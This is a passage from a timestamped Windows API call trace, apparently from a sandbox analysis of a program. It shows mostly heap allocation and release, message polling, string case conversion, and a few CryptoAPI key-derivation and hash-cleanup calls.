Flags=0x0, Size=0x8) returned 0x24b2ce8 [0248.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.273] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.273] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.273] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0248.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.273] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0248.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.274] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.274] CryptDeriveKey (in: hProv=0xad2830, Algid=0x6601, hBaseData=0xaa5760, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0248.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0248.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0248.277] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0248.278] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.279] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.280] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.280] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.280] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.281] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.281] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.282] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0248.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0248.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.283] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0248.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0248.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0248.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.283] CryptDestroyHash (hHash=0xaa5760) returned 1 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0248.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0248.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0248.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0248.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.285] 